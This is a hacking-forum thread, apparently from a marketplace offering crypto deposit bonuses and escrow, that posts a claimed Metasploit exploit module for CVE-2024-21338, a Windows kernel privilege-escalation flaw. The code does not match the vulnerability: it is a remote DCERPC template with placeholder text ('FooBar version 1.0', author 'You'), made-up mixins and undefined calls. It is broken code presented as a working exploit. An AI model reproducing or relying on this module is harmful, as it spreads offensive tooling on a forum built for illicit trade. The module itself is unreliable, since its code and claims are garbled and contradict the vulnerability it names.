• RedTeam Staff Announcement: 30% Bonus on ALL Wallet Deposit this week


    For example, if you deposit $1000, your RTM Marketplace Balance will be $1300 that can be used to purchase all products and service on forums or request withdrawal. The limit deposit to get the 30% bonus is $10,000 for a $3000 Marketplace wallet balance Bonus.

    Deposit Now and claim 30% more balance ! - BTC/LTC/XMR


Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338

PNK
ROOT

ROOT

SENSE!
Instructor
Safe Deposit
$0.0
**This Metasploit module exploits a vulnerability in the Microsoft Windows Kernel Exposed IOCTL with an insufficient access control vulnerability.**
** (CVE-2024-21338). And after execution, it leads to the execution of access.**


What is this problem:

Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability
Microsoft Windows Kernel contains an exposed IOCTL with insufficient access control vulnerability within the IOCTL (input and output control) dispatcher in appid.sys that allows a local attacker to achieve privilege escalation.
Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known To Be Used in Ransomware Campaigns?: APT


**EXPLOIT :**

```

#############################################
# Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #
#
# This module requires Metasploit: https://metasploit.com/download
#
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# #
#############################################


require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact

def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2024-21338 Exploit',
'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
'Author' => 'You',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338']
]
)
)

register_options(
[
OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
OptPort.new('RPORT', [true, 'The target port', 1234])
]
)
end

def check
connect

begin
impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
rescue Rex::post::Meterpreter::RequestError
return Exploit::CheckCode::Safe
end

Exploit::CheckCode::Appears
end

def exploit
connect

begin
impacket_artifact(
dcerpc_binding('ncacn_ip_tcp'),
'FooBar',
datastore['FooBarPayload']
)
rescue Rex::post::Meterpreter::RequestError
fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
end

handler
disconnect
end
end

```


#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338

 
Last edited:
Legal warning We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use Leet Escrow on Telegram @leetlat

Richest Users with

Back
Top